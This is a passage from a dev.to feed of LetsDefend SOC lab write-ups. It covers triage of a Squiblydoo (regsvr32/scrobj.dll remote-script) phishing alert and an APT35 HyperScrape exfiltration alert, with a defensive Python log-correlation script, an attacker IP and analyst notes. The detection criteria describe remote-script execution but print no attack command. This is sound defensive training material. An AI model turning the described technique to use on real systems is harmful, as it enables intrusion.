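&lt;p&gt;Running it over the sample gives three findings: the Outlook-to-cmd.exe parent/child pair, and the Squiblydoo command line once for the cmd.exe wrapper and once for the regsvr32.exe child. The legitimate regsvr32 registration of a local DLL on the last line produces nothing, because it carries neither scrobj.dll nor a URL.&lt;/p&gt;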

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lcft3dc3uywgqt9eqf5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lcft3dc3uywgqt9eqf5.png" alt="email" width="800" height="432"&gt;&lt;/a&gt;&lt;br&gt;
I head to Email Security and look for an email from the sender projectmanagement[@]pm[.]me.&lt;/p&gt;

&lt;p&gt;It carries an attachment named &lt;code&gt;mail.rtf&lt;/code&gt;, with "infected" as its password.&lt;/p&gt;

&lt;p&gt;Now I search for the file's hash on VirusTotal.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05enx1ynijvt4hbftoxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05enx1ynijvt4hbftoxg.png" alt="virustotal" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;25 out of 61 vendors flag this file as malicious.&lt;/p&gt;

&lt;p&gt;Because &lt;code&gt;regsvr32.exe&lt;/code&gt; was used to run a remote script and possibly leverage &lt;code&gt;scrobj.dll&lt;/code&gt;, the activity strongly suggested an ongoing system compromise. Since the remote payload’s exact functionality was unknown—it could have been a reverse shell, ransomware loader, or command-and-control beacon—the system needed to be isolated immediately.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvzpwkn2psfluj13ndl88.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvzpwkn2psfluj13ndl88.png" alt="contained" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The following were my answers for the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14rrwr0e5noz5rbkx2gh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14rrwr0e5noz5rbkx2gh.png" alt="pb1" width="800" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp8vyzfmgpgo2ua30cpfo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp8vyzfmgpgo2ua30cpfo.png" alt="pb2" width="800" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftr2ieflaqy8gw1y203dk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftr2ieflaqy8gw1y203dk.png" alt="log2" width="800" height="448"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looking at the screenshot above, we can see that the source IP (on the internal network) contacted the destination IP, which is the SMTP IP from the alert. So C2 communication did take place.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fko5kx3h51l8u5m1cwtwr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fko5kx3h51l8u5m1cwtwr.png" alt="pb3" width="800" height="471"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flpb153sieebpu90nm16z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flpb153sieebpu90nm16z.png" alt="contain" width="800" height="371"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We already contained the affected host.&lt;/p&gt;

&lt;p&gt;Artifacts are added:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnk8mk6kchzs8tu16mnv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnk8mk6kchzs8tu16mnv.png" alt="artifacts" width="800" height="593"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After adding the Analyst's notes, we finish the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Friv22x29rbzemznblf4v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Friv22x29rbzemznblf4v.png" alt="finish" width="800" height="254"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC250 - APT35 HyperScrape Data Exfiltration Tool Detected</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 26 Apr 2026 12:15:58 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc250-apt35-hyperscrape-data-exfiltration-tool-detected-3c03</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc250-apt35-hyperscrape-data-exfiltration-tool-detected-3c03</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkttonhp95wmjj1e2s2e4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkttonhp95wmjj1e2s2e4.png" alt="takeownership" width="800" height="313"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start by taking ownership of the alert.&lt;/p&gt;

&lt;p&gt;Next, we create a case for the alert.&lt;/p&gt;

&lt;p&gt;The next step is to start the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u1gfruyn0u1dbkjhkl0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u1gfruyn0u1dbkjhkl0.png" alt="playbook" width="800" height="226"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before we move ahead, let's search for the file's hash on VirusTotal:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5vz21fhe43hjny3osj2f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5vz21fhe43hjny3osj2f.png" alt="virustotal" width="800" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;50 out of 70 vendors flag it as malicious, enough for us to conclude that it is.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvkt3wmirg3n0hgprtdui.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvkt3wmirg3n0hgprtdui.png" alt="enfpoint" width="800" height="382"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, we move to Endpoint Security to check whether the malware actually ran on the host; the screenshot above shows that it did.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyi5lyhqt3kf199ftbwb8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyi5lyhqt3kf199ftbwb8.png" alt="logdescription" width="800" height="388"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since the rule describes a data exfiltration attempt, the next step is to move to Log Management and filter the logs by the IP address.&lt;br&gt;
The firewall action reading SUCCESS means the firewall allowed the traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsp5a87hfy9ch1ckq7vtv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsp5a87hfy9ch1ckq7vtv.png" alt="logon" width="800" height="415"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This screenshot shows a log recording a successful logon (Event ID 4624) from the source IP 173.209.51[.]54.&lt;/p&gt;

&lt;p&gt;I look up the IP address on the Threat Intel tab and find out that it is associated with APT35 CharmingKitten (&lt;a href="https://malpedia.caad.fkie.fraunhofer.de/actor/charming_kitten" rel="noopener noreferrer"&gt;https://malpedia.caad.fkie.fraunhofer.de/actor/charming_kitten&lt;/a&gt;).&lt;/p&gt;
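&lt;p&gt;As an added example (not code from the original post or from LetsDefend), the following Python script performs the checks above programmatically: it picks out 4624 logons whose source address lies outside the private ranges, counts the firewall flows that were allowed to that same address, and annotates the result with a threat intel lookup. The event dictionaries, the internal addresses and the filler events are constructed for the example; the external IP, host name and the 11:21/11:22 timestamps follow the investigation.&lt;/p&gt;

```python
"""Triage Windows logon events and firewall logs by address. Added example;
the event dictionaries are a constructed stand-in for fields a SIEM
normalises out of the Windows Security log and a firewall log."""
import ipaddress

# Logon types that imply a network peer: 3 = network (SMB/RPC), 10 = RDP.
REMOTE_LOGON_TYPES = {3, 10}
ALLOW_ACTIONS = {"SUCCESS", "ALLOW", "ALLOWED", "ACCEPT"}


def is_internal(ip):
    """True for RFC1918, loopback and link-local addresses."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local


def external_logons(security_events):
    """Successful logons (4624) over the network from a non-internal address."""
    return [e for e in security_events
            if e["event_id"] == 4624
            and e["logon_type"] in REMOTE_LOGON_TYPES
            and not is_internal(e["src_ip"])]


def allowed_flows_to(firewall_events, ip):
    """Firewall records where traffic to ip was permitted."""
    return [e for e in firewall_events
            if e["dst_ip"] == ip and e["action"].upper() in ALLOW_ACTIONS]


def correlate(security_events, firewall_events, threat_intel):
    """Per external logon source: logon count, allowed outbound flows to it,
    and what threat intel says about it ("unknown" if nothing is known)."""
    report = {}
    for e in external_logons(security_events):
        ip = e["src_ip"]
        entry = report.setdefault(ip, {"logons": 0, "allowed_outbound": 0,
                                       "threat_intel": threat_intel.get(ip, "unknown")})
        entry["logons"] += 1
        entry["allowed_outbound"] = len(allowed_flows_to(firewall_events, ip))
    return report


# Constructed sample data. Host name, attacker IP and the 11:21/11:22
# timestamps follow the investigation; internal addresses and the benign
# filler events are made up (203.0.113.10 is a TEST-NET address).
SECURITY_EVENTS = [
    {"time": "2023-12-27 09:01:44", "host": "Arthur", "event_id": 4624,
     "logon_type": 2, "src_ip": "127.0.0.1"},           # console logon
    {"time": "2023-12-27 10:15:00", "host": "Arthur", "event_id": 4624,
     "logon_type": 3, "src_ip": "172.16.17.20"},        # internal peer
    {"time": "2023-12-27 11:22:10", "host": "Arthur", "event_id": 4624,
     "logon_type": 3, "src_ip": "173.209.51.54"},       # external peer
    {"time": "2023-12-27 11:22:30", "host": "Arthur", "event_id": 4625,
     "logon_type": 3, "src_ip": "173.209.51.54"},       # failed, ignored
]
FIREWALL_EVENTS = [
    {"time": "2023-12-27 11:21:48", "src_ip": "172.16.17.12",
     "dst_ip": "173.209.51.54", "action": "SUCCESS"},
    {"time": "2023-12-27 11:23:01", "src_ip": "172.16.17.12",
     "dst_ip": "173.209.51.54", "action": "SUCCESS"},
    {"time": "2023-12-27 11:40:00", "src_ip": "172.16.17.12",
     "dst_ip": "203.0.113.10", "action": "SUCCESS"},
]
THREAT_INTEL = {"173.209.51.54": "APT35 / Charming Kitten"}

if __name__ == "__main__":
    for ip, entry in correlate(SECURITY_EVENTS, FIREWALL_EVENTS, THREAT_INTEL).items():
        print(ip, entry)
```

&lt;p&gt;On the sample data the report contains a single entry, 173.209.51.54: one successful network logon from it, two firewall flows allowed to it, and a threat intel hit. The console logon and the logon from a private address are filtered out, as is the failed 4625 attempt. Remember to remove the [.] defanging from addresses copied out of a report before handing them to ipaddress.&lt;/p&gt;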

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faeos8vs5as45otcybvca.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faeos8vs5as45otcybvca.png" alt="ip" width="800" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the IP that was contacted by the host after the program ran.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft3uqregrpv5ltei0cqpu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft3uqregrpv5ltei0cqpu.png" alt="Iporption" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the malicious IP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flh84g4kqg8td55ezoxbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flh84g4kqg8td55ezoxbi.png" alt="raw log" width="702" height="691"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Searching Email Security for Arthur's email address (arthur@letsdefend[.]io) returns no traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foc0h4hz53ierdybgit0r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foc0h4hz53ierdybgit0r.png" alt="popop" width="800" height="355"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Checking further in Endpoint Security, we see MpCmdRun.exe running &lt;code&gt;SignaturesUpdateService -ScheduleJob -UnmanagedUpdate&lt;/code&gt;. This is the same command line Microsoft Defender's own scheduled signature update runs on a clean host, so on its own it does not prove that the malware modified the signatures. What makes it worth recording is that it appears on the compromised host shortly after EmailDownloader.exe executed; any Defender signature or exclusion activity around a malware execution should be checked against the update task's normal schedule and parent process.&lt;/p&gt;

&lt;p&gt;Now let's work through the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg9oxawf6jqvyzndnb4x0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg9oxawf6jqvyzndnb4x0.png" alt="verify" width="800" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flolena4suflmm5cwncyq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flolena4suflmm5cwncyq.png" alt="idrecon" width="800" height="280"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fis3jrekp94wja2s5zwc7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fis3jrekp94wja2s5zwc7.png" alt="log" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhflo6bvrjunv0xzbncjc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhflo6bvrjunv0xzbncjc.png" alt="checkalert" width="800" height="482"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz3r1h9jwjzj46uuel1zw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz3r1h9jwjzj46uuel1zw.png" alt="ans1" width="780" height="295"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fghwazvfw0pujuily3syi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fghwazvfw0pujuily3syi.png" alt="attackerip" width="800" height="294"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjdgv6xi7cxpitwm49n6y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjdgv6xi7cxpitwm49n6y.png" alt="malicious" width="800" height="500"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjqkvuuz83alnxbncfr7g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjqkvuuz83alnxbncfr7g.png" alt="morethan1" width="800" height="277"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fccluwwg6fbsje85m5smw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fccluwwg6fbsje85m5smw.png" alt="containescription" width="800" height="252"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fprf9sdjah1mzgmxsjo27.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fprf9sdjah1mzgmxsjo27.png" alt="contained" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs3rrdavlj02nekgsn2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs3rrdavlj02nekgsn2.png" alt="artifatsadded" width="800" height="514"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Analyst's notes:&lt;br&gt;
On December 27, 2023, at 11:22 AM, I identified an alert for suspicious behavior linked to a malicious file (hash: cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa), which VirusTotal confirmed as malicious with a score of 51. Upon investigation, I found that the file executed EmailDownloader.exe, though no associated emails were found in the email security logs. Log analysis revealed a file download at 11:21:48 on the host Arthur, where explorer.exe launched EmailDownloader.exe at 11:21:37, followed by MpCmdRun.exe running SignaturesUpdateService -ScheduleJob -UnmanagedUpdate at 11:38:10. The host was immediately contained with no further compromise, and I recommend blocking the attacker’s IP address and resetting the host’s password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frrrc7eqrqz124ypjam6c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frrrc7eqrqz124ypjam6c.png" alt="finidh" width="800" height="233"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we finish the playbook and close the alert.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>socanalysis</category>
      <category>cybersecurity</category>
      <category>career</category>
    </item>
    <item>
      <title>LetsDefend SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919]</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 26 Apr 2026 08:03:32 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc287-arbitrary-file-read-on-checkpoint-security-gateway-cve-2024-24919-a49</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc287-arbitrary-file-read-on-checkpoint-security-gateway-cve-2024-24919-a49</guid>
